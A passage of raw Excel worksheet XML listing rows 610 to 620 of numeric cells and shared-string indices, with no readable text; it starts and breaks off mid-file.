    <row r="610" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A610">
        <v>2259</v>
      </c>
      <c r="B610" t="s">
        <v>4841</v>
      </c>
      <c r="C610" t="s">
        <v>157</v>
      </c>
      <c r="D610" t="s">
        <v>4842</v>
      </c>
      <c r="E610" t="s">
        <v>142</v>
      </c>
      <c r="F610" t="s">
        <v>143</v>
      </c>
      <c r="G610" s="1">
        <v>44116</v>
      </c>
      <c r="H610">
        <v>492</v>
      </c>
      <c r="I610">
        <v>492</v>
      </c>
      <c r="J610">
        <v>1</v>
      </c>
      <c r="K610">
        <v>0</v>
      </c>
      <c r="L610">
        <v>0</v>
      </c>
      <c r="M610">
        <v>0</v>
      </c>
      <c r="N610">
        <v>0</v>
      </c>
      <c r="O610">
        <v>0</v>
      </c>
      <c r="P610">
        <v>0</v>
      </c>
      <c r="Q610">
        <v>40</v>
      </c>
      <c r="R610">
        <v>24</v>
      </c>
      <c r="S610">
        <v>1</v>
      </c>
      <c r="T610">
        <v>0</v>
      </c>
      <c r="U610">
        <v>130000</v>
      </c>
      <c r="V610">
        <v>0</v>
      </c>
      <c r="W610">
        <v>0</v>
      </c>
      <c r="X610">
        <v>0</v>
      </c>
      <c r="Y610">
        <v>0</v>
      </c>
      <c r="Z610">
        <v>0</v>
      </c>
      <c r="AA610">
        <v>0</v>
      </c>
      <c r="AB610">
        <v>20</v>
      </c>
      <c r="AC610">
        <v>200</v>
      </c>
      <c r="AD610">
        <v>1</v>
      </c>
      <c r="AE610">
        <v>0</v>
      </c>
      <c r="AF610" t="s">
        <v>2582</v>
      </c>
      <c r="AG610">
        <v>60129</v>
      </c>
      <c r="AH610">
        <v>16</v>
      </c>
      <c r="AJ610">
        <v>264</v>
      </c>
      <c r="AK610" t="s">
        <v>2584</v>
      </c>
      <c r="AL610" t="s">
        <v>2583</v>
      </c>
      <c r="AM610" t="s">
        <v>4843</v>
      </c>
      <c r="AN610" t="s">
        <v>55</v>
      </c>
      <c r="AO610">
        <v>2014</v>
      </c>
      <c r="AP610">
        <v>3151500093</v>
      </c>
      <c r="AQ610" t="s">
        <v>2587</v>
      </c>
      <c r="AR610" t="s">
        <v>4844</v>
      </c>
      <c r="AS610" t="s">
        <v>71</v>
      </c>
      <c r="AT610" t="s">
        <v>58</v>
      </c>
      <c r="AU610">
        <v>25</v>
      </c>
      <c r="AV610">
        <v>2</v>
      </c>
      <c r="AW610">
        <v>40</v>
      </c>
      <c r="AX610">
        <v>69</v>
      </c>
      <c r="AY610">
        <v>3</v>
      </c>
      <c r="AZ610">
        <v>20</v>
      </c>
      <c r="BA610" t="s">
        <v>17164</v>
      </c>
      <c r="BB610" t="s">
        <v>15795</v>
      </c>
      <c r="BC610" t="s">
        <v>9948</v>
      </c>
      <c r="BD610" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="611" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A611">
        <v>2206</v>
      </c>
      <c r="B611" t="s">
        <v>4845</v>
      </c>
      <c r="C611" t="s">
        <v>47</v>
      </c>
      <c r="D611" t="s">
        <v>4846</v>
      </c>
      <c r="E611" t="s">
        <v>142</v>
      </c>
      <c r="F611" t="s">
        <v>4847</v>
      </c>
      <c r="G611" s="1">
        <v>43846</v>
      </c>
      <c r="H611">
        <v>504</v>
      </c>
      <c r="I611">
        <v>504</v>
      </c>
      <c r="J611">
        <v>2</v>
      </c>
      <c r="K611">
        <v>1</v>
      </c>
      <c r="L611">
        <v>2</v>
      </c>
      <c r="M611">
        <v>3</v>
      </c>
      <c r="N611">
        <v>0</v>
      </c>
      <c r="O611">
        <v>0</v>
      </c>
      <c r="P611">
        <v>0</v>
      </c>
      <c r="Q611">
        <v>2</v>
      </c>
      <c r="R611">
        <v>0</v>
      </c>
      <c r="S611">
        <v>0</v>
      </c>
      <c r="T611">
        <v>0</v>
      </c>
      <c r="U611">
        <v>1200000</v>
      </c>
      <c r="V611">
        <v>2000</v>
      </c>
      <c r="W611">
        <v>10000</v>
      </c>
      <c r="X611">
        <v>6000</v>
      </c>
      <c r="Y611">
        <v>0</v>
      </c>
      <c r="Z611">
        <v>0</v>
      </c>
      <c r="AA611">
        <v>0</v>
      </c>
      <c r="AB611">
        <v>2000</v>
      </c>
      <c r="AC611">
        <v>0</v>
      </c>
      <c r="AD611">
        <v>0</v>
      </c>
      <c r="AE611">
        <v>0</v>
      </c>
      <c r="AF611" t="s">
        <v>4848</v>
      </c>
      <c r="AG611">
        <v>20414</v>
      </c>
      <c r="AH611">
        <v>2</v>
      </c>
      <c r="AJ611">
        <v>53</v>
      </c>
      <c r="AK611" t="s">
        <v>2220</v>
      </c>
      <c r="AL611" t="s">
        <v>2221</v>
      </c>
      <c r="AM611" t="s">
        <v>4849</v>
      </c>
      <c r="AN611" t="s">
        <v>68</v>
      </c>
      <c r="AO611">
        <v>2010</v>
      </c>
      <c r="AP611">
        <v>8119868899</v>
      </c>
      <c r="AQ611" t="s">
        <v>4850</v>
      </c>
      <c r="AR611" t="s">
        <v>4851</v>
      </c>
      <c r="AS611" t="s">
        <v>71</v>
      </c>
      <c r="AT611" t="s">
        <v>86</v>
      </c>
      <c r="AU611">
        <v>30</v>
      </c>
      <c r="AV611">
        <v>1</v>
      </c>
      <c r="AW611">
        <v>5</v>
      </c>
      <c r="AX611">
        <v>5</v>
      </c>
      <c r="AY611">
        <v>16</v>
      </c>
      <c r="AZ611">
        <v>8</v>
      </c>
      <c r="BA611" t="s">
        <v>16760</v>
      </c>
      <c r="BB611" t="s">
        <v>15764</v>
      </c>
      <c r="BC611">
        <v>0</v>
      </c>
      <c r="BD611">
        <v>0</v>
      </c>
    </row>
    <row r="612" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A612">
        <v>1989</v>
      </c>
      <c r="B612" t="s">
        <v>4852</v>
      </c>
      <c r="C612" t="s">
        <v>157</v>
      </c>
      <c r="D612" t="s">
        <v>4853</v>
      </c>
      <c r="E612" t="s">
        <v>49</v>
      </c>
      <c r="F612" t="s">
        <v>364</v>
      </c>
      <c r="G612" s="1">
        <v>43857</v>
      </c>
      <c r="H612">
        <v>512</v>
      </c>
      <c r="I612">
        <v>512</v>
      </c>
      <c r="J612">
        <v>0</v>
      </c>
      <c r="K612">
        <v>0</v>
      </c>
      <c r="L612">
        <v>0</v>
      </c>
      <c r="M612">
        <v>0</v>
      </c>
      <c r="N612">
        <v>0</v>
      </c>
      <c r="O612">
        <v>0</v>
      </c>
      <c r="P612">
        <v>0</v>
      </c>
      <c r="Q612">
        <v>0</v>
      </c>
      <c r="R612">
        <v>0</v>
      </c>
      <c r="S612">
        <v>0</v>
      </c>
      <c r="T612">
        <v>1</v>
      </c>
      <c r="U612">
        <v>0</v>
      </c>
      <c r="V612">
        <v>0</v>
      </c>
      <c r="W612">
        <v>0</v>
      </c>
      <c r="X612">
        <v>0</v>
      </c>
      <c r="Y612">
        <v>0</v>
      </c>
      <c r="Z612">
        <v>0</v>
      </c>
      <c r="AA612">
        <v>0</v>
      </c>
      <c r="AB612">
        <v>0</v>
      </c>
      <c r="AC612">
        <v>0</v>
      </c>
      <c r="AD612">
        <v>0</v>
      </c>
      <c r="AE612">
        <v>300</v>
      </c>
      <c r="AF612" t="s">
        <v>4854</v>
      </c>
      <c r="AG612">
        <v>0</v>
      </c>
      <c r="AH612">
        <v>16</v>
      </c>
      <c r="AJ612">
        <v>252</v>
      </c>
      <c r="AK612" t="s">
        <v>4855</v>
      </c>
      <c r="AL612" t="s">
        <v>4856</v>
      </c>
      <c r="AM612" t="s">
        <v>4857</v>
      </c>
      <c r="AN612" t="s">
        <v>55</v>
      </c>
      <c r="AO612">
        <v>2016</v>
      </c>
      <c r="AP612" t="s">
        <v>4858</v>
      </c>
      <c r="AQ612" t="s">
        <v>4859</v>
      </c>
      <c r="AR612" t="s">
        <v>4854</v>
      </c>
      <c r="AS612" t="s">
        <v>371</v>
      </c>
      <c r="AT612" t="s">
        <v>58</v>
      </c>
      <c r="AU612">
        <v>26</v>
      </c>
      <c r="AV612">
        <v>1</v>
      </c>
      <c r="AW612">
        <v>4</v>
      </c>
      <c r="AX612">
        <v>4</v>
      </c>
      <c r="AY612">
        <v>1</v>
      </c>
      <c r="AZ612">
        <v>0</v>
      </c>
      <c r="BA612" t="s">
        <v>17039</v>
      </c>
      <c r="BB612">
        <v>0</v>
      </c>
      <c r="BC612">
        <v>0</v>
      </c>
      <c r="BD612" t="s">
        <v>9896</v>
      </c>
    </row>
    <row r="613" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A613">
        <v>2056</v>
      </c>
      <c r="B613" t="s">
        <v>4860</v>
      </c>
      <c r="C613" t="s">
        <v>157</v>
      </c>
      <c r="D613" t="s">
        <v>4861</v>
      </c>
      <c r="E613" t="s">
        <v>916</v>
      </c>
      <c r="F613" t="s">
        <v>4862</v>
      </c>
      <c r="G613" s="1">
        <v>43852</v>
      </c>
      <c r="H613">
        <v>519</v>
      </c>
      <c r="I613">
        <v>519</v>
      </c>
      <c r="J613">
        <v>0</v>
      </c>
      <c r="K613">
        <v>0</v>
      </c>
      <c r="L613">
        <v>0</v>
      </c>
      <c r="M613">
        <v>0</v>
      </c>
      <c r="N613">
        <v>0</v>
      </c>
      <c r="O613">
        <v>0</v>
      </c>
      <c r="P613">
        <v>0</v>
      </c>
      <c r="Q613">
        <v>0</v>
      </c>
      <c r="R613">
        <v>0</v>
      </c>
      <c r="S613">
        <v>0</v>
      </c>
      <c r="T613">
        <v>1</v>
      </c>
      <c r="U613">
        <v>0</v>
      </c>
      <c r="V613">
        <v>0</v>
      </c>
      <c r="W613">
        <v>0</v>
      </c>
      <c r="X613">
        <v>0</v>
      </c>
      <c r="Y613">
        <v>0</v>
      </c>
      <c r="Z613">
        <v>0</v>
      </c>
      <c r="AA613">
        <v>0</v>
      </c>
      <c r="AB613">
        <v>0</v>
      </c>
      <c r="AC613">
        <v>0</v>
      </c>
      <c r="AD613">
        <v>0</v>
      </c>
      <c r="AE613">
        <v>20</v>
      </c>
      <c r="AF613" t="s">
        <v>4863</v>
      </c>
      <c r="AG613">
        <v>61174</v>
      </c>
      <c r="AH613">
        <v>16</v>
      </c>
      <c r="AJ613">
        <v>252</v>
      </c>
      <c r="AK613" t="s">
        <v>366</v>
      </c>
      <c r="AL613" t="s">
        <v>4864</v>
      </c>
      <c r="AM613" t="s">
        <v>4865</v>
      </c>
      <c r="AN613" t="s">
        <v>68</v>
      </c>
      <c r="AO613">
        <v>2012</v>
      </c>
      <c r="AP613" t="s">
        <v>4866</v>
      </c>
      <c r="AQ613" t="s">
        <v>4867</v>
      </c>
      <c r="AR613" t="s">
        <v>4863</v>
      </c>
      <c r="AS613" t="s">
        <v>71</v>
      </c>
      <c r="AT613" t="s">
        <v>72</v>
      </c>
      <c r="AU613">
        <v>27</v>
      </c>
      <c r="AV613">
        <v>1</v>
      </c>
      <c r="AW613">
        <v>0</v>
      </c>
      <c r="AX613">
        <v>0</v>
      </c>
      <c r="AY613">
        <v>9</v>
      </c>
      <c r="AZ613">
        <v>0</v>
      </c>
      <c r="BA613" t="s">
        <v>17050</v>
      </c>
      <c r="BB613" t="s">
        <v>15671</v>
      </c>
      <c r="BC613">
        <v>0</v>
      </c>
      <c r="BD613">
        <v>0</v>
      </c>
    </row>
    <row r="614" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A614">
        <v>2255</v>
      </c>
      <c r="B614" t="s">
        <v>4868</v>
      </c>
      <c r="C614" t="s">
        <v>157</v>
      </c>
      <c r="D614" t="s">
        <v>4869</v>
      </c>
      <c r="E614" t="s">
        <v>142</v>
      </c>
      <c r="F614" t="s">
        <v>4870</v>
      </c>
      <c r="G614" s="1">
        <v>44034</v>
      </c>
      <c r="H614">
        <v>525</v>
      </c>
      <c r="I614">
        <v>525</v>
      </c>
      <c r="J614">
        <v>2</v>
      </c>
      <c r="K614">
        <v>0</v>
      </c>
      <c r="L614">
        <v>1</v>
      </c>
      <c r="M614">
        <v>1</v>
      </c>
      <c r="N614">
        <v>0</v>
      </c>
      <c r="O614">
        <v>0</v>
      </c>
      <c r="P614">
        <v>0</v>
      </c>
      <c r="Q614">
        <v>4</v>
      </c>
      <c r="R614">
        <v>4</v>
      </c>
      <c r="S614">
        <v>0</v>
      </c>
      <c r="T614">
        <v>1</v>
      </c>
      <c r="U614">
        <v>200000</v>
      </c>
      <c r="V614">
        <v>0</v>
      </c>
      <c r="W614">
        <v>3000</v>
      </c>
      <c r="X614">
        <v>1000</v>
      </c>
      <c r="Y614">
        <v>0</v>
      </c>
      <c r="Z614">
        <v>0</v>
      </c>
      <c r="AA614">
        <v>0</v>
      </c>
      <c r="AB614">
        <v>400</v>
      </c>
      <c r="AC614">
        <v>4000</v>
      </c>
      <c r="AD614">
        <v>0</v>
      </c>
      <c r="AE614">
        <v>15000</v>
      </c>
      <c r="AF614" t="s">
        <v>4871</v>
      </c>
      <c r="AG614">
        <v>67218</v>
      </c>
      <c r="AH614">
        <v>16</v>
      </c>
      <c r="AJ614">
        <v>260</v>
      </c>
      <c r="AK614" t="s">
        <v>425</v>
      </c>
      <c r="AL614" t="s">
        <v>2687</v>
      </c>
      <c r="AM614" t="s">
        <v>4872</v>
      </c>
      <c r="AN614" t="s">
        <v>55</v>
      </c>
      <c r="AO614">
        <v>2019</v>
      </c>
      <c r="AP614" t="s">
        <v>4873</v>
      </c>
      <c r="AQ614" t="s">
        <v>4874</v>
      </c>
      <c r="AR614" t="s">
        <v>4875</v>
      </c>
      <c r="AS614" t="s">
        <v>371</v>
      </c>
      <c r="AT614" t="s">
        <v>72</v>
      </c>
      <c r="AU614">
        <v>25</v>
      </c>
      <c r="AV614">
        <v>1</v>
      </c>
      <c r="AW614">
        <v>5</v>
      </c>
      <c r="AX614">
        <v>10</v>
      </c>
      <c r="AY614">
        <v>2</v>
      </c>
      <c r="AZ614">
        <v>0</v>
      </c>
      <c r="BA614" t="s">
        <v>16774</v>
      </c>
      <c r="BB614" t="s">
        <v>15138</v>
      </c>
      <c r="BC614" t="s">
        <v>9687</v>
      </c>
      <c r="BD614" t="s">
        <v>9692</v>
      </c>
    </row>
    <row r="615" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A615">
        <v>2353</v>
      </c>
      <c r="B615" t="s">
        <v>4876</v>
      </c>
      <c r="C615" t="s">
        <v>3165</v>
      </c>
      <c r="D615" t="s">
        <v>4877</v>
      </c>
      <c r="E615" t="s">
        <v>984</v>
      </c>
      <c r="F615" t="s">
        <v>4878</v>
      </c>
      <c r="G615" s="1">
        <v>43859</v>
      </c>
      <c r="H615">
        <v>542</v>
      </c>
      <c r="I615">
        <v>542</v>
      </c>
      <c r="J615">
        <v>2</v>
      </c>
      <c r="K615">
        <v>0</v>
      </c>
      <c r="L615">
        <v>2</v>
      </c>
      <c r="M615">
        <v>0</v>
      </c>
      <c r="N615">
        <v>0</v>
      </c>
      <c r="O615">
        <v>0</v>
      </c>
      <c r="P615">
        <v>0</v>
      </c>
      <c r="Q615">
        <v>2</v>
      </c>
      <c r="R615">
        <v>5</v>
      </c>
      <c r="S615">
        <v>0</v>
      </c>
      <c r="T615">
        <v>1</v>
      </c>
      <c r="U615">
        <v>100</v>
      </c>
      <c r="V615">
        <v>0</v>
      </c>
      <c r="W615">
        <v>3000</v>
      </c>
      <c r="X615">
        <v>0</v>
      </c>
      <c r="Y615">
        <v>0</v>
      </c>
      <c r="Z615">
        <v>0</v>
      </c>
      <c r="AA615">
        <v>0</v>
      </c>
      <c r="AB615">
        <v>100</v>
      </c>
      <c r="AC615">
        <v>200</v>
      </c>
      <c r="AD615">
        <v>0</v>
      </c>
      <c r="AE615">
        <v>3000</v>
      </c>
      <c r="AF615" t="s">
        <v>4879</v>
      </c>
      <c r="AG615">
        <v>0</v>
      </c>
      <c r="AH615">
        <v>34</v>
      </c>
      <c r="AJ615">
        <v>494</v>
      </c>
      <c r="AK615" t="s">
        <v>4880</v>
      </c>
      <c r="AL615" t="s">
        <v>4881</v>
      </c>
      <c r="AM615" t="s">
        <v>4882</v>
      </c>
      <c r="AN615" t="s">
        <v>55</v>
      </c>
      <c r="AO615">
        <v>2019</v>
      </c>
      <c r="AP615">
        <v>0</v>
      </c>
      <c r="AQ615">
        <v>82198076856</v>
      </c>
      <c r="AR615" t="s">
        <v>4883</v>
      </c>
      <c r="AS615" t="s">
        <v>71</v>
      </c>
      <c r="AT615" t="s">
        <v>86</v>
      </c>
      <c r="AU615">
        <v>25</v>
      </c>
      <c r="AV615">
        <v>0</v>
      </c>
      <c r="AW615">
        <v>15</v>
      </c>
      <c r="AX615">
        <v>10</v>
      </c>
      <c r="AY615">
        <v>5</v>
      </c>
      <c r="AZ615">
        <v>4</v>
      </c>
      <c r="BA615" t="s">
        <v>16755</v>
      </c>
      <c r="BB615">
        <v>0</v>
      </c>
      <c r="BC615" t="s">
        <v>9908</v>
      </c>
      <c r="BD615" t="s">
        <v>9914</v>
      </c>
    </row>
    <row r="616" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A616">
        <v>2538</v>
      </c>
      <c r="B616" t="s">
        <v>4142</v>
      </c>
      <c r="C616" t="s">
        <v>47</v>
      </c>
      <c r="D616" t="s">
        <v>4884</v>
      </c>
      <c r="E616" t="s">
        <v>142</v>
      </c>
      <c r="F616" t="s">
        <v>4885</v>
      </c>
      <c r="G616" s="1">
        <v>44370</v>
      </c>
      <c r="H616">
        <v>548</v>
      </c>
      <c r="I616">
        <v>548</v>
      </c>
      <c r="J616">
        <v>1</v>
      </c>
      <c r="K616">
        <v>0</v>
      </c>
      <c r="L616">
        <v>0</v>
      </c>
      <c r="M616">
        <v>0</v>
      </c>
      <c r="N616">
        <v>0</v>
      </c>
      <c r="O616">
        <v>0</v>
      </c>
      <c r="P616">
        <v>0</v>
      </c>
      <c r="Q616">
        <v>0</v>
      </c>
      <c r="R616">
        <v>0</v>
      </c>
      <c r="S616">
        <v>1</v>
      </c>
      <c r="T616">
        <v>0</v>
      </c>
      <c r="U616">
        <v>200</v>
      </c>
      <c r="V616">
        <v>0</v>
      </c>
      <c r="W616">
        <v>0</v>
      </c>
      <c r="X616">
        <v>0</v>
      </c>
      <c r="Y616">
        <v>0</v>
      </c>
      <c r="Z616">
        <v>0</v>
      </c>
      <c r="AA616">
        <v>0</v>
      </c>
      <c r="AB616">
        <v>0</v>
      </c>
      <c r="AC616">
        <v>0</v>
      </c>
      <c r="AD616">
        <v>0</v>
      </c>
      <c r="AE616">
        <v>0</v>
      </c>
      <c r="AF616" t="s">
        <v>4886</v>
      </c>
      <c r="AG616">
        <v>20241</v>
      </c>
      <c r="AH616">
        <v>2</v>
      </c>
      <c r="AJ616">
        <v>53</v>
      </c>
      <c r="AK616" t="s">
        <v>4887</v>
      </c>
      <c r="AL616" t="s">
        <v>1583</v>
      </c>
      <c r="AM616" t="s">
        <v>4888</v>
      </c>
      <c r="AN616" t="s">
        <v>68</v>
      </c>
      <c r="AO616">
        <v>1993</v>
      </c>
      <c r="AP616" t="s">
        <v>1931</v>
      </c>
      <c r="AQ616" t="s">
        <v>4889</v>
      </c>
      <c r="AR616" t="s">
        <v>4890</v>
      </c>
      <c r="AS616" t="s">
        <v>179</v>
      </c>
      <c r="AT616" t="s">
        <v>58</v>
      </c>
      <c r="AU616">
        <v>26</v>
      </c>
      <c r="AV616">
        <v>1</v>
      </c>
      <c r="AW616">
        <v>0</v>
      </c>
      <c r="AX616">
        <v>0</v>
      </c>
      <c r="AY616">
        <v>10</v>
      </c>
      <c r="AZ616">
        <v>2</v>
      </c>
      <c r="BA616">
        <v>0</v>
      </c>
      <c r="BB616">
        <v>0</v>
      </c>
      <c r="BC616" t="s">
        <v>9945</v>
      </c>
      <c r="BD616">
        <v>0</v>
      </c>
    </row>
    <row r="617" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A617">
        <v>2526</v>
      </c>
      <c r="B617" t="s">
        <v>4891</v>
      </c>
      <c r="C617" t="s">
        <v>47</v>
      </c>
      <c r="D617" t="s">
        <v>4892</v>
      </c>
      <c r="E617" t="s">
        <v>2453</v>
      </c>
      <c r="F617" t="s">
        <v>4893</v>
      </c>
      <c r="G617" s="1">
        <v>43853</v>
      </c>
      <c r="H617">
        <v>549</v>
      </c>
      <c r="I617">
        <v>549</v>
      </c>
      <c r="J617">
        <v>2</v>
      </c>
      <c r="K617">
        <v>0</v>
      </c>
      <c r="L617">
        <v>0</v>
      </c>
      <c r="M617">
        <v>6</v>
      </c>
      <c r="N617">
        <v>0</v>
      </c>
      <c r="O617">
        <v>0</v>
      </c>
      <c r="P617">
        <v>0</v>
      </c>
      <c r="Q617">
        <v>0</v>
      </c>
      <c r="R617">
        <v>3</v>
      </c>
      <c r="S617">
        <v>1</v>
      </c>
      <c r="T617">
        <v>1</v>
      </c>
      <c r="U617">
        <v>200</v>
      </c>
      <c r="V617">
        <v>0</v>
      </c>
      <c r="W617">
        <v>0</v>
      </c>
      <c r="X617">
        <v>900</v>
      </c>
      <c r="Y617">
        <v>0</v>
      </c>
      <c r="Z617">
        <v>0</v>
      </c>
      <c r="AA617">
        <v>0</v>
      </c>
      <c r="AB617">
        <v>0</v>
      </c>
      <c r="AC617">
        <v>3000</v>
      </c>
      <c r="AD617">
        <v>1</v>
      </c>
      <c r="AE617">
        <v>200</v>
      </c>
      <c r="AF617" t="s">
        <v>4894</v>
      </c>
      <c r="AG617">
        <v>20242</v>
      </c>
      <c r="AH617">
        <v>2</v>
      </c>
      <c r="AJ617">
        <v>53</v>
      </c>
      <c r="AK617" t="s">
        <v>1582</v>
      </c>
      <c r="AL617" t="s">
        <v>1583</v>
      </c>
      <c r="AM617" t="s">
        <v>4895</v>
      </c>
      <c r="AN617" t="s">
        <v>55</v>
      </c>
      <c r="AO617">
        <v>2017</v>
      </c>
      <c r="AP617" t="s">
        <v>4896</v>
      </c>
      <c r="AQ617" t="s">
        <v>4897</v>
      </c>
      <c r="AR617" t="s">
        <v>4898</v>
      </c>
      <c r="AS617" t="s">
        <v>71</v>
      </c>
      <c r="AT617" t="s">
        <v>86</v>
      </c>
      <c r="AU617">
        <v>25</v>
      </c>
      <c r="AV617">
        <v>2</v>
      </c>
      <c r="AW617">
        <v>61</v>
      </c>
      <c r="AX617">
        <v>99</v>
      </c>
      <c r="AY617">
        <v>4</v>
      </c>
      <c r="AZ617">
        <v>1</v>
      </c>
      <c r="BA617" t="s">
        <v>17152</v>
      </c>
      <c r="BB617" t="s">
        <v>15867</v>
      </c>
      <c r="BC617" t="s">
        <v>9952</v>
      </c>
      <c r="BD617" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="618" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A618">
        <v>2525</v>
      </c>
      <c r="B618" t="s">
        <v>2621</v>
      </c>
      <c r="C618" t="s">
        <v>189</v>
      </c>
      <c r="D618" t="s">
        <v>4899</v>
      </c>
      <c r="E618" t="s">
        <v>111</v>
      </c>
      <c r="F618" t="s">
        <v>4900</v>
      </c>
      <c r="G618" s="1">
        <v>43847</v>
      </c>
      <c r="H618">
        <v>569</v>
      </c>
      <c r="I618">
        <v>569</v>
      </c>
      <c r="J618">
        <v>3</v>
      </c>
      <c r="K618">
        <v>2</v>
      </c>
      <c r="L618">
        <v>2</v>
      </c>
      <c r="M618">
        <v>0</v>
      </c>
      <c r="N618">
        <v>0</v>
      </c>
      <c r="O618">
        <v>0</v>
      </c>
      <c r="P618">
        <v>0</v>
      </c>
      <c r="Q618">
        <v>0</v>
      </c>
      <c r="R618">
        <v>8</v>
      </c>
      <c r="S618">
        <v>0</v>
      </c>
      <c r="T618">
        <v>1</v>
      </c>
      <c r="U618">
        <v>500000</v>
      </c>
      <c r="V618">
        <v>5000</v>
      </c>
      <c r="W618">
        <v>10000</v>
      </c>
      <c r="X618">
        <v>0</v>
      </c>
      <c r="Y618">
        <v>0</v>
      </c>
      <c r="Z618">
        <v>0</v>
      </c>
      <c r="AA618">
        <v>0</v>
      </c>
      <c r="AB618">
        <v>0</v>
      </c>
      <c r="AC618">
        <v>20000</v>
      </c>
      <c r="AD618">
        <v>0</v>
      </c>
      <c r="AE618">
        <v>50000</v>
      </c>
      <c r="AF618" t="s">
        <v>4901</v>
      </c>
      <c r="AG618">
        <v>97128</v>
      </c>
      <c r="AH618">
        <v>31</v>
      </c>
      <c r="AJ618">
        <v>461</v>
      </c>
      <c r="AK618" t="s">
        <v>1566</v>
      </c>
      <c r="AL618" t="s">
        <v>1567</v>
      </c>
      <c r="AM618" t="s">
        <v>4902</v>
      </c>
      <c r="AN618" t="s">
        <v>68</v>
      </c>
      <c r="AO618">
        <v>2019</v>
      </c>
      <c r="AP618">
        <v>911354176</v>
      </c>
      <c r="AQ618" t="s">
        <v>4903</v>
      </c>
      <c r="AR618" t="s">
        <v>4901</v>
      </c>
      <c r="AS618" t="s">
        <v>71</v>
      </c>
      <c r="AT618" t="s">
        <v>86</v>
      </c>
      <c r="AU618">
        <v>25</v>
      </c>
      <c r="AV618">
        <v>0</v>
      </c>
      <c r="AW618">
        <v>0</v>
      </c>
      <c r="AX618">
        <v>0</v>
      </c>
      <c r="AY618">
        <v>12</v>
      </c>
      <c r="AZ618">
        <v>26</v>
      </c>
      <c r="BA618" t="s">
        <v>17151</v>
      </c>
      <c r="BB618" t="s">
        <v>15851</v>
      </c>
      <c r="BC618" t="s">
        <v>9902</v>
      </c>
      <c r="BD618">
        <v>0</v>
      </c>
    </row>
    <row r="619" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A619">
        <v>1988</v>
      </c>
      <c r="B619" t="s">
        <v>4904</v>
      </c>
      <c r="C619" t="s">
        <v>157</v>
      </c>
      <c r="D619" t="s">
        <v>4905</v>
      </c>
      <c r="E619" t="s">
        <v>142</v>
      </c>
      <c r="F619" t="s">
        <v>4906</v>
      </c>
      <c r="G619" s="1">
        <v>43851</v>
      </c>
      <c r="H619">
        <v>619</v>
      </c>
      <c r="I619">
        <v>619</v>
      </c>
      <c r="J619">
        <v>1</v>
      </c>
      <c r="K619">
        <v>1</v>
      </c>
      <c r="L619">
        <v>1</v>
      </c>
      <c r="M619">
        <v>0</v>
      </c>
      <c r="N619">
        <v>0</v>
      </c>
      <c r="O619">
        <v>0</v>
      </c>
      <c r="P619">
        <v>0</v>
      </c>
      <c r="Q619">
        <v>1</v>
      </c>
      <c r="R619">
        <v>1</v>
      </c>
      <c r="S619">
        <v>1</v>
      </c>
      <c r="T619">
        <v>1</v>
      </c>
      <c r="U619">
        <v>5000</v>
      </c>
      <c r="V619">
        <v>9000</v>
      </c>
      <c r="W619">
        <v>3500</v>
      </c>
      <c r="X619">
        <v>0</v>
      </c>
      <c r="Y619">
        <v>0</v>
      </c>
      <c r="Z619">
        <v>0</v>
      </c>
      <c r="AA619">
        <v>0</v>
      </c>
      <c r="AB619">
        <v>750</v>
      </c>
      <c r="AC619">
        <v>1500</v>
      </c>
      <c r="AD619">
        <v>1</v>
      </c>
      <c r="AE619">
        <v>3500</v>
      </c>
      <c r="AF619" t="s">
        <v>4907</v>
      </c>
      <c r="AG619">
        <v>66271</v>
      </c>
      <c r="AH619">
        <v>16</v>
      </c>
      <c r="AJ619">
        <v>231</v>
      </c>
      <c r="AK619" t="s">
        <v>4908</v>
      </c>
      <c r="AL619" t="s">
        <v>4909</v>
      </c>
      <c r="AM619" t="s">
        <v>4910</v>
      </c>
      <c r="AN619" t="s">
        <v>68</v>
      </c>
      <c r="AO619">
        <v>2019</v>
      </c>
      <c r="AP619" t="s">
        <v>4911</v>
      </c>
      <c r="AQ619" t="s">
        <v>4912</v>
      </c>
      <c r="AR619" t="s">
        <v>4907</v>
      </c>
      <c r="AS619" t="s">
        <v>71</v>
      </c>
      <c r="AT619" t="s">
        <v>58</v>
      </c>
      <c r="AU619">
        <v>48</v>
      </c>
      <c r="AV619">
        <v>1</v>
      </c>
      <c r="AW619">
        <v>15</v>
      </c>
      <c r="AX619">
        <v>17</v>
      </c>
      <c r="AY619">
        <v>8</v>
      </c>
      <c r="AZ619">
        <v>0</v>
      </c>
      <c r="BA619" t="s">
        <v>17038</v>
      </c>
      <c r="BB619" t="s">
        <v>15628</v>
      </c>
      <c r="BC619">
        <v>0</v>
      </c>
      <c r="BD619">
        <v>0</v>
      </c>
    </row>
    <row r="620" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A620">
        <v>2295</v>
      </c>
      <c r="B620" t="s">
        <v>4913</v>
      </c>
      <c r="C620" t="s">
        <v>47</v>
      </c>
      <c r="D620" t="s">
        <v>4914</v>
      </c>
      <c r="E620" t="s">
        <v>142</v>
      </c>
      <c r="F620" t="s">
        <v>4915</v>
      </c>
      <c r="G620" s="1">
        <v>43900</v>
      </c>
      <c r="H620">
        <v>630</v>
      </c>
      <c r="I620">
        <v>630</v>
      </c>
      <c r="J620">
        <v>1</v>
      </c>
      <c r="K620">
        <v>0</v>
      </c>
      <c r="L620">
        <v>0</v>
      </c>
      <c r="M620">
        <v>0</v>
      </c>
      <c r="N620">
        <v>0</v>
      </c>
      <c r="O620">
        <v>0</v>
      </c>
      <c r="P620">
        <v>0</v>
      </c>
      <c r="Q620">
        <v>0</v>
      </c>
      <c r="R620">
        <v>0</v>
      </c>
      <c r="S620">
        <v>0</v>
      </c>
      <c r="T620">
        <v>0</v>
      </c>
      <c r="U620">
        <v>300</v>
      </c>
      <c r="V620">
        <v>0</v>
      </c>
      <c r="W620">
        <v>200</v>
      </c>
      <c r="X620">
        <v>0</v>
      </c>
      <c r="Y620">
        <v>0</v>
      </c>
      <c r="Z620">
        <v>0</v>
      </c>
      <c r="AA620">
        <v>0</v>
      </c>
      <c r="AB620">
        <v>0</v>
      </c>
      <c r="AC620">
        <v>0</v>
